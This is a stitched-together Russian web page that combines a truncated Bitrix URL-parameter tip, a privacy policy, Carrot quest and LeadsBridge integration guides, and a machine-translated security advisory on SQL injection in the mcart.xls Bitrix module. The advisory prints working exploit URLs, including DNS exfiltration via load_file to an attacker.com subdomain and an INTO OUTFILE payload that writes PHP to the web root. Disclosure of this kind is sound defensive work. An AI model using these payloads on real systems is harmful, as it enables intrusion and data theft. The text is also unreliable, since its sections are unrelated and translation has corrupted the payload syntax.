Битрикс получить параметры из url: CMain::GetCurPageParam

alexxlab

Работа с параметрами ссылки · Блог веб-студии Keengo

05.06.2014

Иногда в 1С Битрикс необходимо преобразовать ссылку, заменив или убрав параметры в ней:

http://mysite.ru/news?page=1&id=15&sort=date

Для этого можно воспользоваться функцией $APPLICATION->GetCurPageParam($add, $delete), где вместо $add добавить новое условие, а вместо $delete добавить массив параметров, которые нужно удалить.

Так, например, чтобы получить из исходной ссылки такую:

http://mysite.ru/news?id=21

Нужно добавить такую функцию

  • HTML
  • CSS
  • JS
  • SQL
  • Код

Нам будет приятно

Поделитесь

  1. Общие положения.
    1. Настоящая Политика конфиденциальности персональных данных (далее — Политика) действует в отношении всех персональных данных, которую компания Keengo (далее – Компания), может получить от пользователя (лица, заполнившего форму обратной связи, использующего другие сервисы официального сайта keengo.
      ru (далее – Сайт)), в частности в ходе: отправки отзывов или вопросов, заказа услуг, участия в рекламных и/или маркетинговых кампаниях или акциях и/или ином взаимодействии (далее – Услуги).
    2. Заполняя форму обратной связи и нажимая кнопку «Согласен/на», расположенную на странице Сайта, на которой размещена форма обратной связи, а равно указывая свои персональные данные при использовании других сервисов Сайта, пользователь выражает согласие с настоящей Политикой и указанными в ней условиями обработки и передачи его персональных данных. Согласие Пользователя на предоставление, обработку и передачу его Персональных данных Компании в соответствии с Политикой является полным и безусловным.
    3. Посетителям Сайта следует воздержаться от заполнения формы и/или от использования других сервисов Сайта в случае несогласия (полного или частичного) с Политикой, а равно несогласия предоставить персональные данные.
    4. Согласие, даваемое пользователем, включает в себя согласие на сбор, систематизацию, накопление, хранение, уточнение (обновление, изменение), использование, занесение в базы данных (в том числе электронные) Компании, передачу внутри Компании другим отделам и подразделениям или поставщику услуг, обязующегося выполнять условия договора о защите персональных данных, в целях рассылки информационных материалов и/или в рекламных целях (в том числе рассылку приглашений на мероприятия, проводимые/организованные Компанией), трансграничную передачу, блокирование, обезличивание, уничтожение персональных данных.
    5. Согласие, даваемое пользователем, распространяется на следующие персональные данные: фамилия, имя, отчество, адрес электронной почты, должность, наименование организации, в которой работает пользователь, контактный телефон.
    6. Срок действия согласия пользователя является неограниченным, однако, пользователь вправе в любой момент отозвать настоящее согласие путём направления письменного уведомления на адрес электронной почты: [email protected], с пометкой «отзыв согласия на обработку персональных данных».
  2. Персональные данные пользователей, которые получает и обрабатывает Компания.
    1. В рамках настоящей Политики под персональными данными пользователя понимаются персональные данные, которые пользователь предоставляет о себе самостоятельно при заполнении формы обратной связи на Сайте, при использовании других сервисов Сайта, при регистрации (создании учётной записи) на Сайте или в процессе использования услуг, предоставляемых Компанией. Соответствующая информация явно обозначена, к ней, в частности отнесены: фамилия, имя, отчество, адрес электронной почты, должность, наименование организации, в которой работает пользователь, контактный телефон.
      Иная информация предоставляется пользователем на его усмотрение.
    2. Компания исходит из того, что пользователь представляет достоверные персональные данные, а также, что пользователь имеет право предоставить персональные данные.
  3. 1С Битрикс.
    1. Компания использует средство 1С Битрикс для сбора сведений об использовании Сайта, таких как частота посещения Сайта пользователями, посещенные страницы и сайта, на которых были пользователи до перехода на данный Сайт. 1С Битрикс собирает только IP-адреса, назначенные пользователю в день посещения данного Сайта, но не имя или другие идентификационные сведения.
    2. 1С Битрикс размещает постоянный cookie-файл в веб-браузере пользователя для идентификации в качестве уникального пользователя при следующем посещении данного Сайта. Этот cookie-файл не может использоваться никем, кроме 1С Битрикс. Сведения, собранные с помощью cookie-файла, будут храниться на серверах, находящихся в Российской Федерации.
    3. Компания использует сведения, полученные через 1С Битрикс, только для обработки и хранения персональных данных.
  4. Цели обработки персональной информации пользователей.
    1. Компания обрабатывает только те персональные данные, которые необходимы для оказания услуг.
    2. Персональную информацию пользователя Компании может использовать в следующих целях:
      1. Идентификация стороны в рамках оказания услуги.
      2. Рассылка рекламных и/или маркетинговых материалов Компании, рассылка приглашений на мероприятия, конференции, выставки, проводимые и/или организуемые Компанией, проведение телемаркетинговых компаний.
      3. Проведение статистических и иных исследований, на основе обезличенных данных.
  5. Передача персональных данных пользователя третьим лицам.
    1. В отношении персональных данных пользователя сохраняется ее конфиденциальность, кроме случаев обработки персональных данных, доступ неограниченного круга лиц к которым предоставлен пользователем либо по его просьбе.
    2. Компания вправе передать персональную информацию пользователя третьим лицам в следующих случаях:
      1. Пользователь предоставил свое согласие на такие действия.
      2. Передача персональных данных организациям, которые оказывают услуги Компании по рассылке рекламных и/или маркетинговых материалов, организации и проведению мероприятий, конференций, выставок, телемаркетингу, обзвону потенциальных клиентов Компании.
      3. Передача необходима для достижения целей, осуществления и выполнения функций, полномочий и обязанностей, возложенных законодательством Российской Федерации на Компанию.
  6. Меры, применяемые для защиты персональных данных пользователей.
    1. Компания принимает необходимые и достаточные организационные и технические меры для защиты персональных данных пользователя от неправомерного или случайного доступа, уничтожения, изменения, блокирования, копирования, распространения, а также от иных неправомерных действий с персональными данными третьих лиц.
  7. Права и обязанности пользователя.
    1. Компания предпринимает разумные меры для поддержания точности и актуальности, имеющихся у Компании персональных данных, а также удаления устаревших и других недостоверных или излишних персональных данных, тем не менее, Пользователь несет ответственность за предоставление достоверных сведений, а также за обновление предоставленных данных в случае каких-либо изменений.
    2. Пользователь может в любой момент изменить (обновить, дополнить, блокировать, уничтожить) предоставленную им персональную информацию или её часть, а также параметры её конфиденциальности путем обращения в Компанию.
    3. Пользователь вправе в любой момент отозвать согласие на обработку Компанией персональных данных путём направления письменного уведомления на электронный адрес: [email protected] с пометкой «отзыв согласия на обработку персональных данных», при этом отзыв пользователем согласия на обработку персональных данных влечёт за собой удаление учётной записи пользователя с Сайта и баз данных Компании, а также уничтожение записей, содержащих персональные данные, в системах обработки персональных данных Компании.
    4. Пользователь имеет право на получение информации, касающейся обработки его персональных данных Компанией.

Логин

Пароль

1С-Битрикс | База знаний

Интеграция Carrot quest с 1С-Битрикс позволяет автоматически собирать информацию о действиях клиентов вашего интернет-магазина. Чем больше вы о них знаете, тем более персональными становятся ваши предложения и тем лучше конвертируются пользователи.

Настройка интеграции

Шаг 1. Установка модуля для 1С Битрикс

Чтобы настроить интеграцию, нужно скачать модуль Carrot quest для 1С Битрикс и установить к себе на сайт.

Модуль ориентирован на магазины и требует наличия установленных модулей «Интернет-магазин (sale)» и «Торговый каталог (catalog)«.

Шаг 2. Скопируйте ключи доступа

Для начала работы Вам понадобятся параметры «API Key», «API Secret» и «User Auth Key». Их можно узнать в разделе «Настройки» в панели администратора Вашего аккаунта Carrot quest. 

Шаг 3. Настройка модуля

В административной панели Вашего сайта перейдите в раздел «Настройки — Разработчикам». В настройках модулей найдите «Carrot Quest» и вставьте ключи в соответствующие поля.

Установите адрес страницы корзины, чтобы мы могли сохранять для Вас событие просмотра клиентом корзины.

Перейдите в раздел «Магазин», в настройках найдите «Свойства заказа», «Список свойств». В отобразившемся списке найдите свойство, хранящее телефон, и посмотрите значение в столбце «ID».

К найденному ID добавьте строку ORDER_PROP_ и запишите полученную строку в поле «Телефон пользователя», чтобы при завершении клиентом заказа мы сохранили для Вас его телефон. 

Вы можете исключить страницы, на которых не должен работать код Carrot Quest, чтобы избежать ошибок. Для этого перечислите страницы-исключения в специальном поле. Обратите внимание, что каждую такую страницу надо писать с новой строки и без домена.

События, передаваемые при интеграции, и их свойства

  • Просмотр товара ($product_viewed)
    • Название товара ($name)
    • Ссылка на страницу с описанием товара ($url)
    • Цена товара, в рублях. Целое число. ($amount)
    • Ссылка на картинку с товаром ($img)
  • Добавление товара ($cart_added)
    • Название товара ($name)
    • Ссылка на страницу с описанием товара ($url)
    • Цена товара, в рублях. Целое число. ($amount)
    • Ссылка на картинку с товаром ($img)
  • Просмотр корзины ($cart_viewed) — при правильно указанном в настройках модуля адресе страницы корзины
    • Массив с названиями товаров ($name)
    • Массив ссылок на страницы с описанием товара ($url)
    • Массив с ценами товара, в рублях. Целое число ($amount)
    • Массив со ссылками на картинку с товаром ($img)
  • Окончание оформления заказа ($order_completed)
    • ID заказа (внутренний) ($order_id)
    • Сумма заказа ($order_amount)
  • Оплата заказа ($order_paid)
    • ID заказа (внутренний) ($order_id)
  • Возврат оплаты заказа ($order_refunded)
    • ID заказа (внутренний) ($order_id)
  • Заказ выполнен ($order_closed)
    • ID заказа (внутренний) ($order_id)
  • Заказ отменен ($order_cancelled)
    • ID заказа (внутренний) ($order_id)
    • Комментарий ($comment)

Самостоятельные свойства

  • Сумма в корзине (целое число) ($cart_amount) — обновляется при посещении корзины, при добавлении товара
  • Просмотренные товары (список из название товаров) ($viewed_products) — обновляется при просмотре товара
  • Корзина (список из названий товаров) ($cart_items) — обновляется при посещении корзины
  • Статус последнего заказа ($last_order_status) — обновляется при изменении статуса, отправляется в последнего активного лида клиента
  • Последняя оплата (целое число) ($last_payment) — обновляется при завершении оформления заказа
  • Доход с пользователя (целое число, сумма всех заказов) ($revenue) — обновляется при завершении оформления заказа
  • Имя клиента ($name) — обновляется при окончании оформления заказа
  • Email клиента ($email) — обновляется при окончании оформления заказа
  • Телефон клиента ($phone) — обновляется при окончании оформления заказа, при наличии в настройках модуля кода свойства «Телефон» заказа.

Подключить вебхук Битрикс24 к HTTP-запросу (GET/POST) с помощью LeadsBridge

В этой статье вы узнаете, как настроить мост и подключить Вебхук Битрикс24 к HTTP-запросу (GET/POST) с помощью LeadsBridge.

Пошаговое руководство по настройке моста

Прежде чем начать

  1. Перейдите на левую боковую панель и нажмите Мосты
  2. Вы попадете на мостов раздел вашего аккаунта
  3. Нажмите кнопку Добавить новый
  4. Вы перейдете к первому этапу создания моста

Шаг 1: Основная информация о мосте

  1. Выберите имя для своего моста (оно будет видно только внутри LeadsBridge)
  2. Вы можете добавить метки, которые помогут вам идентифицировать ваш мост позже
  3. Выберите Bitrix24 Webhook в качестве источника для вашего моста
  4. Выберите HTTP-запрос (GET/POST) в качестве пункта назначения
  5. Нажмите кнопку Далее

Шаг 2: Настройте источник

Bitrix24 Webhook
  1. Введите имя, которое вы хотите назвать своей интеграцией
  2. Введите URL входящего Webhook для подключения вашего Bitrix24 Webhook к LeadsBridge
  4. Чтобы найти Inbound Webhook для подключения Bitrix24 Webhook (как Destination) к LeadsBridge, выполните следующие действия:
    1. Войдите в свою учетную запись Bitrix24
    2. В меню слева перейдите к Подробнее. .. » Ресурсы для разработчиков
    3. Нажмите Другое » Входящий веб-перехватчик вверху страницы
    4. Нажмите на карандаш рядом с Входящий веб-перехватчик и дайте свой Webh например имя , Входящий веб-перехватчик LeadsBridge
    5. Убедитесь, что профиль выбран в разделе Конструктор запросов
    6. В разделе Назначьте разрешения , нажмите + выберите
    7. Затем назначьте CRM и пользователей
    8. Нажмите СОХРАНИТЬ
    9. вставьте URL-адрес в поле Inbound Webhook URL ваша интеграция
    10. Наконец, нажмите Готово или Продолжить с вашей конфигурацией моста

  5. Выберите сегмент , который вы хотите использовать в качестве источника потенциальных клиентов
  6. Нажмите кнопку Далее

Шаг 3: Настройте HTTP-запрос

(GET/POST) пункт назначения
  1. Введите имя интеграции в специальное поле
  2. Введите URL-адрес , Метод , Тип содержимого и Тело для соединения HTTP-запрос (GET/POST) с LeadsBridge
    • URL обязательный : где находится система, в которую вы хотите отправить информацию.
    • Метод обязательный : метод запроса, который ваша система может получить в качестве указания на желаемое действие, которое необходимо выполнить.
      • POST — значение по умолчанию. Он используется для отправки данных на сервер для создания/обновления ресурса и является одним из наиболее распространенных методов HTTP. Если вы не уверены в том, что выбрать, оставьте все как есть.
    • Тип контента обязательный : используется для указания типа носителя ресурса. Работает как описание типа контента для тела сообщения.
      • application/x-www-form-urlencoded — наиболее распространенный тип кодирования. Используйте это, если вы не используете какой-либо язык JSON или XML в теле запроса.
    • Тело обязательное : в теле сообщения устанавливаются все данные, которые в конечном итоге формируют HTTP-запрос, который будет отправлен для вставки каждого лида в вашу систему.
      • Синтаксис тела должен быть следующим: "field_id": "значение″ » field_id » уникальный идентификатор поля внутри вашей CRM/платформы; » значение » может быть статическим (число или текст, который будет одинаковым для каждого синхронизированного лида) или динамическим.0016
      • Для создания динамических значений просто введите имя поля между двойными символами @@ , что приведет к синтаксису @@field_name@@. Имя поля может быть каким угодно, оно поможет вам распознать поле в настройках моста позже.
        Динамические поля будут отображаться на шаге сопоставления полей моста, где вы сможете сопоставить их с информацией об интересе.
      • Тем не менее, если на нашей платформе есть поле full_name для хранения полного имени лида, мы должны использовать следующий синтаксис:
        full_name: @@FullName@@ Примеры кода см. в общих вопросах HTTP.

    • Шаблон успеха необязательный : сообщение, которое ваша система отвечает после успешного получения запроса.
    • Шаблон сбоя необязательный : сообщение об ошибке, которое ваша система отправляет при возникновении проблемы с запросом.
    • Пропустить параметры кодирования в URL необязательный : если включено, запрещается кодирование специальных символов в параметрах URL
  7. Нажмите кнопку Далее
  8. Теперь вы сможете выбрать целевой сегмент для отправки лидов на
    9. .
  9. Вы можете выбрать получение квитанции по электронной почте для каждого входящего лида.
    • Введите адрес(а), по которому вы хотите получить квитанцию ​​
    • Вы также можете изменить строку Тема электронного письма
      • .
  10. Нажмите кнопку Далее

Шаг 4: Сопоставление полей

Здесь вы сможете сопоставить информацию об источнике с полями назначения.

Вы увидите имя поля с логотипом целевой интеграции вверху, это указывает имя поля на HTTP-запрос (GET/POST) .

Внизу есть поле, куда вы можете добавить информацию, которую хотите отправить.

  • Проверить каждое из доступных полей HTTP-запроса (GET/POST)
  • Сопоставьте информацию, которую вы хотите передать с Bitrix24 Webhook
  • Вы можете ввести информацию вручную и передать ее как статическое значение
  • Используйте функции для настройки информации, такой как переформатирование даты и времени или изменение текста, телефонных номеров и т. д.
  • Вы также можете оставить пустым поле информации поля, которое вы не хотите отправлять через
Пользовательские поля
  1. Если вы хотите добавить дополнительные поля, просто посмотрите внизу страницы
  2. Перейдите на страницу «Не можете найти настраиваемое поле CRM?» коробка
  3. Выберите поле, которое вы хотите добавить, из раскрывающегося списка
  4. Нажмите кнопку Добавить пользовательское поле
  6. Поле появится выше
  7. Добавьте нужную информацию, как вы делали с другими

После достижения желаемого результата просто нажмите Далее и перейдите к последнему шагу.

Шаг 5: Проверка

На этом последнем шаге вы сможете отправить лида из LeadsBridge, чтобы проверить, правильно ли работает конфигурация.

  1. Чтобы создать новый тестовый провод, введите необходимую информацию при появлении запроса
  2. Нажмите Протестируйте сейчас
  3. Чтобы протестировать реальный лид, переключите переключатель на «Тестировать с существующим лидом».
  4. Нажмите Синхронизировать сейчас вдоль лида, который вы хотите отправить
  5. Если вы все сделали правильно, кнопка станет зеленой, это означает, что ваш лид успешно синхронизирован и интеграция готова
  6. Нажмите Готово , чтобы сохранить настройки и активировать мост

Вот и все! Поздравляем.

Вы будете перенаправлены в раздел мостов вашей учетной записи с зеленым сообщением об успешном завершении в правом верхнем углу страницы, и теперь ваш мост будет активен.

Есть вопросы?

Вы можете ознакомиться с общими вопросами в соответствующей документации по интеграции.

  • Источник: Вебхук Битрикс24
  • Назначение: HTTP-запрос (GET/POST)

Если у вас есть другие вопросы или вам нужна помощь в настройке моста с Bitrix24 Webhook на HTTP-запрос (GET/POST) с LeadsBridge, не стесняйтесь обращаться в нашу службу поддержки!

mcart.xls Модуль Bitrix 6.5.2 — Внедрение SQL 

 Код рекомендации: HTB23279
Продукт: Модуль mcart.xls Битрикс
Продавец: www.mcart.ru
Уязвимые версии: 6.5.2 и, возможно, более ранние
Проверенная версия: 6.5.2
Информационная публикация: 18 ноября 2015 г. [без технических подробностей]
Уведомление поставщика: 18 ноября 2015 г.
Публичное раскрытие информации: 13 января 2016 г.
Тип уязвимости: SQL-инъекция [CWE-89]
Ссылка CVE: CVE-2015-8356
Уровень риска: средний
Базовая оценка CVSSv3: 6,3 [CVSS:3. 0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L]
Обнаружено и предоставлено: Исследовательская лаборатория безопасности High-Tech Bridge (https://www.htbridge.com/advisory/)  -------------------------------------------------- ------------------------------------------------------------  Консультативная информация:  Исследовательская лаборатория High-Tech Bridge Security обнаружила несколько уязвимостей SQL Injection в модуле mcart.xls Bitrix, которые могут быть использованы для выполнения произвольных SQL-запросов и получения потенциально конфиденциальных данных, изменения информации в базе данных и получения полного контроля над уязвимым веб-сайтом.  Все обнаруженные уязвимости требуют авторизации злоумышленника на сайте и доступа к уязвимому модулю. Однако уязвимости можно эксплуатировать и через CSRF-вектор, поскольку веб-приложение не проверяет происхождение полученных запросов. Это означает, что удаленный анонимный злоумышленник может создать страницу с эксплойтом CSRF, заставить жертву посетить эту страницу и выполнить произвольные SQL-запросы в базе данных уязвимого веб-сайта. 1. Входные данные, передаваемые через параметр HTTP GET "xls_profile" в скрипт "/bitrix/admin/mcart_xls_import.php", не очищаются должным образом перед использованием в SQL-запросе. Удаленный злоумышленник, прошедший проверку подлинности, может манипулировать SQL-запросами, вводя произвольный код SQL.  Приведенный ниже PoC-код основан на методе эксфильтрации DNS и может использоваться, если база данных уязвимого приложения размещена в системе Windows. PoC отправит DNS-запрос с требованием IP-адреса для `version ()` (или любого другого конфиденциального вывода из базы данных) субдомена «.attacker.com» (доменное имя, DNS-сервер которого контролируется злоумышленником):  http://[host]/bitrix/admin/mcart_xls_import.php?del_prof_real=1&xls_profile=%27%20OR%201=(select%20load_file(CONCAT(CHAR(9)2), СИМВОЛ (92), (выбрать% 20версия()), СИМВОЛ (46), СИМВОЛ (97), СИМВОЛ (116), СИМВОЛ (116), СИМВОЛ (97), СИМВОЛ (99), СИМВОЛ (107) , СИМВОЛ (101), СИМВОЛ (114), СИМВОЛ (46), СИМВОЛ (99), СИМВОЛ (111), СИМВОЛ (109), СИМВОЛ (92), СИМВОЛ (102), СИМВОЛ (111), СИМВОЛ (111) ,СИМВОЛ(98),СИМВОЛ(97),СИМВОЛ(114))))+--+  2. Входные данные, переданные через параметр HTTP GET "xls_profile" в скрипт "/bitrix/admin/mcart_xls_import.php", не подвергаются надлежащей санации перед использованием в SQL-запросе. Удаленный злоумышленник, прошедший проверку подлинности, может манипулировать SQL-запросами, вводя произвольный код SQL.  Простой эксплойт ниже запишет строку «» в файл «/var/www/file.php»:  http://[хост]/bitrix/admin/mcart_xls_import.php?xls_profile=%27%20UNION%20SELECT%201,%27%3C?%20phpinfo%28%29;%20?%3E%27,3,4,5,6,7,8,9,0%20INTO%20OUTFILE%20%27/var/www/file.php%27%20--%202  Успешная эксплуатация требует, чтобы файл "/var/www/file.php" был доступен для записи системной учетной записи MySQL.  3. Ввод передается через параметры HTTP GET "xls_iblock_id", "xls_iblock_section_id", "firstRow", "titleRow", "firstColumn", "highestColumn", "sku_iblock_id" и "xls_iblock_section_id_new" в "/bitrix/admin/mcart_xls_import_step_2.php " скрипт не подвергается надлежащей очистке перед использованием в SQL-запросе. Удаленный злоумышленник, прошедший проверку подлинности, может манипулировать SQL-запросами, вводя произвольный код SQL.  Ниже приведен список эксплойтов для каждого уязвимого параметра. Эксплойты основаны на технике DNS-эксфильтрации и могут быть использованы, если база данных уязвимого приложения размещена в системе Windows. PoC отправит DNS-запрос с требованием IP-адреса для `version ()` (или любого другого конфиденциального вывода из базы данных) субдомена «.attacker.com» (доменное имя, DNS-сервер которого контролируется злоумышленником):  "xls_iblock_id":  http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_translit_code=Y&xls_iblock_id=0,0,0,0,0,0,0,0,0,(select%20load_file(CONCAT(CHAR(9)2), СИМВОЛ (92), (выбрать% 20версия()), СИМВОЛ (46), СИМВОЛ (97), СИМВОЛ (116), СИМВОЛ (116), СИМВОЛ (97), СИМВОЛ (99), СИМВОЛ (107) , СИМВОЛ (101), СИМВОЛ (114), СИМВОЛ (46), СИМВОЛ (99), СИМВОЛ (111), СИМВОЛ (109), СИМВОЛ (92), СИМВОЛ (102), СИМВОЛ (111), СИМВОЛ (111) ,CHAR(98),CHAR(97),CHAR(114))))%29+--+&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstRow=0&titleRow=0&firstColumn=0&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_iblock_section_id_new=0
"xls_iblock_section_id"
http://[host]/bitrix/admin/mcart_xls_import_step_2. php?save_profile=Y&make_translit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0,0,(select%20load_file(CONCAT(CHAR(9)2), СИМВОЛ (92), (выбрать% 20версия()), СИМВОЛ (46), СИМВОЛ (97), СИМВОЛ (116), СИМВОЛ (116), СИМВОЛ (97), СИМВОЛ (99), СИМВОЛ (107) , СИМВОЛ (101), СИМВОЛ (114), СИМВОЛ (46), СИМВОЛ (99), СИМВОЛ (111), СИМВОЛ (109), СИМВОЛ (92), СИМВОЛ (102), СИМВОЛ (111), СИМВОЛ (111) ,CHAR(98),CHAR(97),CHAR(114))))%29+--+&XLS_IDENTIFY=0&firstRow=0&titleRow=0&firstColumn=0&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_iblock_section_id_new=0  "Первая строка":  http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_translit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstRow=0,0,0,0,0,0,0,0,0(выберите%20load_file( СЦЕП(СИМВОЛ(9)2), СИМВОЛ (92), (выбрать% 20версия()), СИМВОЛ (46), СИМВОЛ (97), СИМВОЛ (116), СИМВОЛ (116), СИМВОЛ (97), СИМВОЛ (99), СИМВОЛ (107) , СИМВОЛ (101), СИМВОЛ (114), СИМВОЛ (46), СИМВОЛ (99), СИМВОЛ (111), СИМВОЛ (109), СИМВОЛ (92), СИМВОЛ (102), СИМВОЛ (111), СИМВОЛ (111) ,CHAR(98),CHAR(97),CHAR(114))))%29+--+&titleRow=0&firstColumn=0&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_iblock_section_id_new=0  "строка заголовка":  http://[host]/bitrix/admin/mcart_xls_import_step_2. php?save_profile=Y&make_translit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstRow=0&titleRow=0,0,0,0,0,0,0,(select%20load_file(CONCAT (СИМВОЛ(92), СИМВОЛ (92), (выбрать% 20версия()), СИМВОЛ (46), СИМВОЛ (97), СИМВОЛ (116), СИМВОЛ (116), СИМВОЛ (97), СИМВОЛ (99), СИМВОЛ (107) , СИМВОЛ (101), СИМВОЛ (114), СИМВОЛ (46), СИМВОЛ (99), СИМВОЛ (111), СИМВОЛ (109), СИМВОЛ (92), СИМВОЛ (102), СИМВОЛ (111), СИМВОЛ (111) ,CHAR(98),CHAR(97),CHAR(114))))%29+--+&firstColumn=0&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_iblock_section_id_new=0  "первая колонка":  http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_translit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstRow=0&titleRow=0&firstColumn=0%27,0,0,0,0,0,(select%20load_file (CONCAT(СИМВОЛ(9)2), СИМВОЛ (92), (выбрать% 20версия()), СИМВОЛ (46), СИМВОЛ (97), СИМВОЛ (116), СИМВОЛ (116), СИМВОЛ (97), СИМВОЛ (99), СИМВОЛ (107) , СИМВОЛ (101), СИМВОЛ (114), СИМВОЛ (46), СИМВОЛ (99), СИМВОЛ (111), СИМВОЛ (109), СИМВОЛ (92), СИМВОЛ (102), СИМВОЛ (111), СИМВОЛ (111) ,CHAR(98),CHAR(97),CHAR(114))))%29+--+&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_iblock_section_id_new=0  "высшая колонка":  http://[host]/bitrix/admin/mcart_xls_import_step_2. php?save_profile=Y&make_translit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstRow=0&titleRow=0&firstColumn=0&highestColumn=0%27,0,0,0,0,(select%20load_file (CONCAT(СИМВОЛ(9)2), СИМВОЛ (92), (выбрать% 20версия()), СИМВОЛ (46), СИМВОЛ (97), СИМВОЛ (116), СИМВОЛ (116), СИМВОЛ (97), СИМВОЛ (99), СИМВОЛ (107) , СИМВОЛ (101), СИМВОЛ (114), СИМВОЛ (46), СИМВОЛ (99), СИМВОЛ (111), СИМВОЛ (109), СИМВОЛ (92), СИМВОЛ (102), СИМВОЛ (111), СИМВОЛ (111) ,CHAR(98),CHAR(97),CHAR(114))))%29+--+&XLS_GLOBALS=0&sku_iblock_id=1&cml2_link_code=1&xls_iblock_section_id_new=0  "sku_iblock_id":  http://[host]/bitrix/admin/mcart_xls_import_step_2.php?save_profile=Y&make_translit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstRow=0&titleRow=0&firstColumn=0&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1,0, 0,0,(выбрать%20load_file (CONCAT(СИМВОЛ(9)2), СИМВОЛ (92), (выбрать% 20версия()), СИМВОЛ (46), СИМВОЛ (97), СИМВОЛ (116), СИМВОЛ (116), СИМВОЛ (97), СИМВОЛ (99), СИМВОЛ (107) , СИМВОЛ (101), СИМВОЛ (114), СИМВОЛ (46), СИМВОЛ (99), СИМВОЛ (111), СИМВОЛ (109), СИМВОЛ (92), СИМВОЛ (102), СИМВОЛ (111), СИМВОЛ (111) ,CHAR(98),CHAR(97),CHAR(114))))%29+--+&cml2_link_code=1&xls_iblock_section_id_new=0  "xls_iblock_section_id_new":  http://[host]/bitrix/admin/mcart_xls_import_step_2. php?save_profile=Y&make_translit_code=Y&xls_iblock_id=0&xls_iblock_section_id=0&XLS_IDENTIFY=0&firstRow=0&titleRow=0&firstColumn=0&highestColumn=0&XLS_GLOBALS=0&sku_iblock_id=1&cml 2_link_code=1&xls_iblock_section_id_new=0,(выберите%20load_file(CONCAT (СИМВОЛ(92), СИМВОЛ (92), (выбрать% 20версия()), СИМВОЛ (46), СИМВОЛ (97), СИМВОЛ (116), СИМВОЛ (116), СИМВОЛ (97), СИМВОЛ (99), СИМВОЛ (107) , СИМВОЛ (101), СИМВОЛ (114), СИМВОЛ (46), СИМВОЛ (99), СИМВОЛ (111), СИМВОЛ (109), СИМВОЛ (92), СИМВОЛ (102), СИМВОЛ (111), СИМВОЛ (111) ,СИМВОЛ(98),СИМВОЛ(97),СИМВОЛ(114))))%29+--+  -------------------------------------------------- ------------------------------------------------------------  Решение:  График раскрытия информации:
18.11.2015 Поставщик уведомлен по электронной почте, ответа нет.
01.12.2015 Поставщик уведомлен по электронной почте, ответа нет.
04.12.2015 Поставщик уведомлен через контактную форму и по электронной почте, ответа нет.
11.12.2015 Запрошено исправление через контактную форму и по электронной почте, ответа нет. 28.12.2015 Исправление запрошено через контактную форму и по электронной почте, ответа нет.
11.01.2016 Запрошено исправление через контактную форму и по электронной почте, ответа нет.
13.01.2016 Публичное раскрытие информации.  В настоящее время нам неизвестно какое-либо официальное решение этой уязвимости.  -------------------------------------------------- ------------------------------------------------------------  Использованная литература:  [1] Рекомендации по высокотехнологичному мосту HTB23279- https://www.htbridge.com/advisory/HTB23279 - Множественные уязвимости SQL Injection в модуле mcart.xls Bitrix
[2] mcart.xls - https://marketplace.1c-bitrix.ru/solutions/mcart.xls/ - Модуль Битрикс для загрузки и импорта данных из файла Excel.
[3] Common Vulnerabilities and Exposures (CVE) — http://cve.mitre.org/ — международный по масштабу и бесплатный для общего пользования CVE® — это словарь общеизвестных уязвимостей и уязвимостей информационной безопасности.
[4] Common Weakness Enumeration (CWE) — http://cwe.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *